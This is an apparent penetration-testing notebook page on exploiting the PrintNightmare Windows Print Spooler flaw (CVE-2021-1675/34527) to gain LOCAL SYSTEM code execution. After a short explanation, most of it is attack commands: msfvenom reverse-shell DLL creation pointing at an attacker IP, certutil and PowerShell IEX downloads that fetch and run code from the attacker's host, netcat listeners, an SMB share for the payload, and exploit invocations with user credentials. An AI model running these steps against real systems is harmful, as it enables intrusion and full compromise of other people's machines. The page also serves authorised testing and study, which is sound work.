💥Cyb3rBook

PRINTNIGHTMARE

3 min read

PRIMARY CATEGORY → PRINT SPOOLER SERVICE

Theory

The Printnightmare is a well-known security flaw related to CVE-2021-34527 and CVE-2021-1675

The vulnerable endpoint is the Windows Print Spooler service, which runs as LOCAL SYSTEM

Therefore, an operator could leverage some security flaws related to this service in order to gain remote or local code execution as LOCAL SYSTEM, which means that the entire system in question is compromised

Code Execution as LOCAL SYSTEM

Windows Privesc

Workflow

The RpcAddPrinterDriverEx and RpcAddPrinterDriver functions of the MS-PAR ( Microsoft Print System Asynchronous Remote Protocol ) protocol do not verify correctly the permissions that a remote peer has to install a printer driver in the given system

Therefore, we could leverage this wrong permission validation to load a malicious DLL file instead of a legitimate printer driver. Since this service runs as LOCAL SYSTEM, we wil gain code execution as this system account, thereby compromising the entire system

So, once we compromise a non-privileged user account, we can simply call or invoke one of the vulnerable RPC functions and pass to it a malicious DLL we crafted previously, which can be located locally or remotely

Requirements
  • The operator must have a low-privileged access to the system

i.e. Interactive ( e.g. Physically ), RemoteInteractive ( e.g. RDP ) or Network ( e.g. WinRM, Reverse Shell and so on )

  • The Print Spooler service must be running on the target
Abuse - Windows
Verifying whether the service is running or not

CMD & PS

sc.exe queryex spooler

PS

Get-CIMInstance -ClassName win32_service -Filter 'name="spooler"' | Select -ExpandProperty state
Verifying if the service runs as LOCAL SYSTEM

It’s usually not necessary to check this, but we will never know for sure unless we check it

Get-CIMInstance -ClassName win32_service -Filter 'name="spooler"' | Select -ExpandProperty startName
Malicious DLL Setup
  • Creating the malicious DLL

From the attacker ⚔️

msfvenom --payload windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=<ATTACKER_PORT> --arch x64 --platform windows --format dll --out <MALICIOUS>.dll
  • Transferring it to the target

From the attacker ⚔️

python3 -m http.server 80

From the target 🎯

mkdir C:\Windows\Temp\LPE
cd C:\Windows\Temp\LPE
certutil.exe -urlcache -split -f 'http://<ATTACKER_IP>/<MALICIOUS>.dll'
Exploit Setup

CVE-2021-1675

Fileless

  • Downloading the exploit

From the attacker ⚔️

curl --silent --location --request GET --remote-name 'https://github.com/calebstewart/CVE-2021-1675/raw/refs/heads/main/CVE-2021-1675.ps1'
  • Transferring it to the target

From the attacker ⚔️

python -m http.server 80

From the target 🎯

IEX (New-Object Net.WebClient).downloadString('http://<ATTACKER_IP>/CVE-2021-1675.ps1')
Setting up a TCP Listener

From the attacker ⚔️

rlwrap -CaR nc -nlvp <TCP_PORT>
Running the exploit

From the target 🎯

Invoke-Nightmare -DLL '<DLL>'

RCE as LOCAL SYSTEM

Workflow

See Code Execution as LOCAL SYSTEM

Requirements

  • A controlled local or domain user account

  • The Print Spooler service must be running on the target

RPC Endpoint accesible ( either via named pipes or dynamic ports )

Abuse - UNIX-Like
Checking if the Target’s RPC Namedpipes are available

Impacket’s RPCDump.py

Looking for MS-RPRN or MS-PAR pipes enabled

rpcdump.py '<DOMAIN>/<USER>:<PASSWD>@<TARGET>' | grep -iP --color -- 'MS-(RPRN|PAR)'
Creating a DLL Payload (Reverse Shell)

MSFVenom

msfvenom --payload windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=<ATTACKER_PORT> --format dll --platform windows --arch x64 --out remote.dll
Setting up an SMB Server

Impacket’s SMBServer.py

smbserver.py -smb2support <SHARE> <LOCAL_PATH>
Setting up a Netcat Listener for the Rev. Shell

Netcat

rlwrap -CaR nc -nlvp <PORT>
Running the Exploit

CVE-2021-1675.py

From the Attacker ⚔️

python3 CVE-2021-1675.py '<DOMAIN>/<USER>:<PASSWD>@<TARGET>' '\\<ATTACKER>\<SHARE>\remote.dll'

Graph View

Backlinks